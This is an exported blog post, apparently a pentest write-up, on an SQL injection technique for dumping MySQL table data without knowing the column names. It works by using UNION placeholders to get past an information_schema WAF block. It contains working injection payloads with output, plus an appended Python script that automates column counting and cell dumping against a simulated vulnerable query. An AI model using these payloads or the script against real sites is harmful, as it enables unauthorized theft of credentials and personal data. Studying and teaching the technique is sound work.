{"id":339,"date":"2019-02-09T14:19:36","date_gmt":"2019-02-09T14:19:36","guid":{"rendered":"http:\/\/blog.redforce.io\/?p=339"},"modified":"2024-12-14T15:24:05","modified_gmt":"2024-12-14T15:24:05","slug":"sqli-extracting-data-without-knowing-columns-names","status":"publish","type":"post","link":"https:\/\/blog.redforce.io\/sqli-extracting-data-without-knowing-columns-names\/","title":{"rendered":"[SQLi] Extracting data without knowing columns names"},"content":{"rendered":"<h2><span class=\"ez-toc-section\" id=\"Introduction\"><\/span>Introduction<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><em><strong>You can skip this part<\/strong><\/em><br \/>\nYou might face a situation in which you have to dump data from a specific table in a MySQL database.<br \/>\nTo do so, you normally need the table name and the names of the columns you want to dump, which can be tricky to obtain in some cases:<br \/>\nfor instance, when the target runs MySQL &lt; 5 (which has no information_schema), or runs MySQL &gt;= 5 but sits behind a WAF that blacklists any request mentioning information_schema. That was the situation we had.<br \/>\nIn such cases, retrieving the DB server version or even the DB name is usually enough proof of concept to establish the severity of the vulnerability.<br \/>\nBut we were permitted to proceed with the exploitation and gain the highest privileges we could.<br \/>\nWe started with brute-forcing table names, followed by brute-forcing column names.<br \/>\nThe only useful hit was the table name <strong>users<\/strong>, along with a couple of uninteresting table names.<br \/>\nBrute-forcing the column names of <strong>users<\/strong> returned a single valid column name, <strong>id<\/strong>, which isn&#8217;t enough to gain further access.<\/p>\n<h2><span class=\"ez-toc-section\"
id=\"Injecting_without_column_names\"><\/span>Injecting without column names<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>With my teammate <a href=\"https:\/\/twitter.com\/aboul3la\">@aboul3la<\/a>\u00a0we created a dummy database simulating the target&#8217;s and started searching for a way to extract data from the table without knowing the column names, which we found after some searching mixed with a lot of trial and error.<\/p>\n<p>Executing the following normal query returns the contents of the users table:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\">MariaDB [dummydb]&gt; select * from users;\r\n+----+--------------+------------------------------------------+-----------------------------+------------+---------------------+\r\n| id | name         | password                                 | email                       | birthdate  | added               |\r\n+----+--------------+------------------------------------------+-----------------------------+------------+---------------------+\r\n|  1 | alias        | a45d4e080fc185dfa223aea3d0c371b6cc180a37 | veronica80@example.org      | 1981-05-03 | 1993-03-20 14:03:14 |\r\n|  2 | accusamus    | 114fec39a7c9567e8250409d467fed64389a7bee | sawayn.amelie@example.com   | 1979-10-28 | 2007-01-20 18:38:29 |\r\n|  3 | dolor        | 7f796c9e61c32a5ec3c85fed794c00eee2381d73 | stefan41@example.com        | 2005-11-16 | 1992-02-16 04:19:05 |\r\n|  4 | et           | aaaf2b311a1cd97485be716a896f9c09aff55b96 | zwalsh@example.com          | 2015-07-22 | 2014-03-05 22:57:18 |\r\n|  5 | voluptatibus | da16b4d9661c56bb448899d7b6d30060da014446 | pattie.medhurst@example.net | 1991-11-22 | 2005-12-04 20:38:41 |\r\n+----+--------------+------------------------------------------+-----------------------------+------------+---------------------+\r\n5 rows in set (0.00 sec)<\/pre>\n<p>The columns <span style=\"color: #ff0000;\">name, password, email, birthdate, added<\/span> are the ones we need to read, but on the target we only know <strong>id<\/strong>, not their names.<\/p>\n<p>The next step is
to replace the column names with known values that we can select by.<br \/>\nIn SQL this is:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\">MariaDB [dummydb]&gt; select 1,2,3,4,5,6 union select * from users;\r\n+---+--------------+------------------------------------------+-----------------------------+------------+---------------------+\r\n| 1 | 2            | 3                                        | 4                           | 5          | 6                   |\r\n+---+--------------+------------------------------------------+-----------------------------+------------+---------------------+\r\n| 1 | 2            | 3                                        | 4                           | 5          | 6                   |\r\n| 1 | alias        | a45d4e080fc185dfa223aea3d0c371b6cc180a37 | veronica80@example.org      | 1981-05-03 | 1993-03-20 14:03:14 |\r\n| 2 | accusamus    | 114fec39a7c9567e8250409d467fed64389a7bee | sawayn.amelie@example.com   | 1979-10-28 | 2007-01-20 18:38:29 |\r\n| 3 | dolor        | 7f796c9e61c32a5ec3c85fed794c00eee2381d73 | stefan41@example.com        | 2005-11-16 | 1992-02-16 04:19:05 |\r\n| 4 | et           | aaaf2b311a1cd97485be716a896f9c09aff55b96 | zwalsh@example.com          | 2015-07-22 | 2014-03-05 22:57:18 |\r\n| 5 | voluptatibus | da16b4d9661c56bb448899d7b6d30060da014446 | pattie.medhurst@example.net | 1991-11-22 | 2005-12-04 20:38:41 |\r\n+---+--------------+------------------------------------------+-----------------------------+------------+---------------------+\r\n6 rows in set (0.00 sec)<\/pre>\n<p>The column names are now 1, 2, 3, 4, 5, 6 instead of id, name, password, email, birthdate, added, because a UNION takes its column names from its first SELECT, which here is the\u00a0<code class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">select 1,2,3,4,5,6<\/code>\u00a0part of the query. The first SELECT must have exactly as many columns as the target table, otherwise MySQL rejects the UNION with \"The used SELECT statements have a different number of columns\"; when the column count is unknown, add placeholders one at a time until that error disappears.<\/p>\n<p>The next step is selecting data by these numeric column names, which is done by selecting `column_number` from the previous query used as a derived table, which MySQL requires to have a
table alias.<br \/>\nThe following query\u00a0<code class=\"EnlighterJSRAW\" data-enlighter-language=\"sql\">select `4` from (select 1,2,3,4,5,6 union select * from users)redforce;<\/code>\u00a0selects column number 4, which is the email address column (the backticks are required because an identifier cannot consist solely of digits):<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\">MariaDB [dummydb]&gt; select `4` from (select 1,2,3,4,5,6 union select * from users)redforce;\r\n+-----------------------------+\r\n| 4                           |\r\n+-----------------------------+\r\n| 4                           |\r\n| veronica80@example.org      |\r\n| sawayn.amelie@example.com   |\r\n| stefan41@example.com        |\r\n| zwalsh@example.com          |\r\n| pattie.medhurst@example.net |\r\n+-----------------------------+\r\n6 rows in set (0.00 sec)<\/pre>\n<p>Changing the 4 to 3 returns the password column, 2 the name column, and so on. The first row of the result (the literal 4) is the placeholder row contributed by the <code class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">select 1,2,3,4,5,6<\/code> half of the UNION; the real rows follow it.<br \/>\n<img class=\"alignnone size-full wp-image-385\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2019\/02\/Screen-Shot-2019-02-09-at-8.49.43-PM.png\" alt=\"\" width=\"1344\" height=\"1294\" \/><\/p>\n<p>Combining this with our injection point gives the payload\u00a0<code class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">-1 union select 1,(select `4` from (select 1,2,3,4,5,6 union select * from users)a limit 1,1)-- -<\/code><br \/>\nThe inner subquery must return exactly one row, hence <code class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">limit 1,1<\/code>: the offset of 1 skips the placeholder row and the limit of 1 returns the first real user; increase the offset to walk through the remaining rows (a UNION without ORDER BY does not guarantee row order, so check that the offset lands on the row you expect). The outer <code class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">select 1,(...)<\/code> must match the number of columns of the vulnerable query, and the trailing <code class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">-- -<\/code> comments out the rest of it. Modify this to fit your needs.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\">MariaDB [dummydb]&gt; select author_id,title from posts where author_id=-1 union select 1,(select `2` from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);\r\n+-----------+-------+\r\n| author_id | title |\r\n+-----------+-------+\r\n|         1 | alias |\r\n+-----------+-------+\r\n1 row in set (0.00 sec)\r\n\r\nMariaDB [dummydb]&gt; select author_id,title from posts where author_id=-1 union select 1,(select `3` from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);\r\n+-----------+------------------------------------------+\r\n| author_id | title                                    |\r\n+-----------+------------------------------------------+\r\n|         1 | a45d4e080fc185dfa223aea3d0c371b6cc180a37 |\r\n+-----------+------------------------------------------+\r\n1 row in set (0.00 sec)\r\n\r\nMariaDB [dummydb]&gt; select author_id,title from posts where author_id=-1 union select 1,(select `4` from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);\r\n+-----------+------------------------+\r\n| author_id | title                  |\r\n+-----------+------------------------+\r\n|         1 | veronica80@example.org |\r\n+-----------+------------------------+\r\n1 row in set (0.00 sec)<\/pre>\n<p><img class=\"alignnone size-full wp-image-387\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2019\/02\/Screen-Shot-2019-02-09-at-9.02.38-PM.png\" alt=\"\" width=\"2024\" height=\"204\" \/><\/p>\n<h2><span class=\"ez-toc-section\" id=\"In_a_nutshell\"><\/span>In a nutshell<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<blockquote><p>You can achieve this by selecting everything from the target table in a UNION whose first SELECT consists of known values (1, 2, 3, ...), so that the result columns take those values as names, then selecting by those names from the result used as a derived table. In the final payload, concat() joins the password and email columns with 0x3a (the hex literal for a colon) as separator, so the payload needs no quote characters.<br \/>\nFinal payload<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">MariaDB [dummydb]&gt; select author_id,title from posts where author_id=-1 union select 1,(select concat(`3`,0x3a,`4`) from (select 1,2,3,4,5,6 union select * from users)a limit 1,1);\r\n+-----------+-----------------------------------------------------------------+\r\n| author_id | title                                                           |\r\n+-----------+-----------------------------------------------------------------+\r\n|         1 | a45d4e080fc185dfa223aea3d0c371b6cc180a37:veronica80@example.org |\r\n+-----------+-----------------------------------------------------------------+<\/pre>\n<\/blockquote>\n<p>Happy hacking<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Extracting data without knowing column names from MySQL < 5, or when a WAF blacklists information_schema in the
request\n<\/p>\n","protected":false},"author":2,"featured_media":342,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29],"tags":[31,32,33],"class_list":["entry","author-a-sultan","has-excerpt","has-more-link","post-339","post","type-post","status-publish","format-standard","has-post-thumbnail","category-web-security","tag-bugbounty","tag-sql-injection","tag-waf-bypass"],"_links":{"self":[{"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/posts\/339","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/comments?post=339"}],"version-history":[{"count":14,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/posts\/339\/revisions"}],"predecessor-version":[{"id":414,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/posts\/339\/revisions\/414"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/media\/342"}],"wp:attachment":[{"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/media?parent=339"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/categories?post=339"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/tags?post=339"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
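As an added, runnable walk-through of the whole procedure in the post above (first find how many columns the target table has, then pull cells by column position from the `select 1,2,...,n union select * from users` derived table), here is a Python script that is not part of the original post. It simulates the post's vulnerable `posts` query against an in-memory SQLite database built from three of the post's sample users rows, because SQLite runs offline; the target in the post is MariaDB/MySQL. Assumptions: SQLite, like MySQL, names a UNION's result columns after its first SELECT and rejects a UNION whose sides have different column counts; the `vulnerable_query` function, the `posts` rows and all helper names are invented for this example.

```python
import sqlite3

# Constructed fixture standing in for the post's "dummydb": an in-memory SQLite
# database with the same two tables. The three users rows are copied from the
# post's sample output; the posts rows are invented. SQLite is used only so the
# script runs offline; the post's target is MariaDB/MySQL.
SCHEMA = """
CREATE TABLE users(id INTEGER, name TEXT, password TEXT, email TEXT,
                   birthdate TEXT, added TEXT);
CREATE TABLE posts(author_id INTEGER, title TEXT);
INSERT INTO users VALUES
 (1,'alias','a45d4e080fc185dfa223aea3d0c371b6cc180a37','veronica80@example.org',
  '1981-05-03','1993-03-20 14:03:14'),
 (2,'accusamus','114fec39a7c9567e8250409d467fed64389a7bee','sawayn.amelie@example.com',
  '1979-10-28','2007-01-20 18:38:29'),
 (3,'dolor','7f796c9e61c32a5ec3c85fed794c00eee2381d73','stefan41@example.com',
  '2005-11-16','1992-02-16 04:19:05');
INSERT INTO posts VALUES (1,'hello world'),(2,'second post');
"""


def open_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def vulnerable_query(con, author_id):
    """The injectable query from the post: untrusted input glued into the SQL.
    A real target usually needs a trailing '-- -' to comment out whatever follows
    the injection point; nothing follows here, so the payloads below omit it."""
    sql = "select author_id,title from posts where author_id=" + author_id
    return con.execute(sql).fetchall()


def placeholders(n):
    # "1,2,...,n": the first SELECT of the UNION, which names the columns 1..n
    return ",".join(str(i) for i in range(1, n + 1))


def find_column_count(con, table, max_cols=32):
    """Step the post takes for granted: the placeholder SELECT must have exactly
    as many columns as the target table, otherwise the UNION fails at parse time
    (MySQL: 'The used SELECT statements have a different number of columns').
    Try 1, 2, 3, ... placeholders until the query stops erroring."""
    for n in range(1, max_cols + 1):
        payload = (f"-1 union select 1,(select `1` from "
                   f"(select {placeholders(n)} union select * from {table}) a limit 1)")
        try:
            vulnerable_query(con, payload)
            return n
        except sqlite3.Error:
            continue
    return None


def extract_cell(con, table, ncols, col, row):
    """Read column number `col` (a position, not a name) of the `row`-th real row.
    Offset row+1 skips the placeholder row (1,2,...,n) that the UNION contributes,
    which is exactly what the post's 'limit 1,1' does for the first user."""
    payload = (f"-1 union select 1,(select `{col}` from "
               f"(select {placeholders(ncols)} union select * from {table}) a "
               f"limit 1 offset {row + 1})")
    rows = vulnerable_query(con, payload)
    return rows[0][1]


def dump_row(con, table, ncols, row):
    """Walk every column position of one row, one request per cell."""
    return [extract_cell(con, table, ncols, c, row) for c in range(1, ncols + 1)]


if __name__ == "__main__":
    db = open_db()
    n = find_column_count(db, "users")
    print("users has", n, "columns")
    for r in range(3):
        print(dump_row(db, "users", n, r))
```

`find_column_count` works unchanged against MySQL, since the column-count mismatch is a parse-time error there too. On a real target this costs one request per cell; the post's final `concat(`3`,0x3a,`4`)` payload is the MySQL way to batch several columns into one request (SQLite has no `concat()` and reads `0x3a` as an integer, which is why this script leaves that part out).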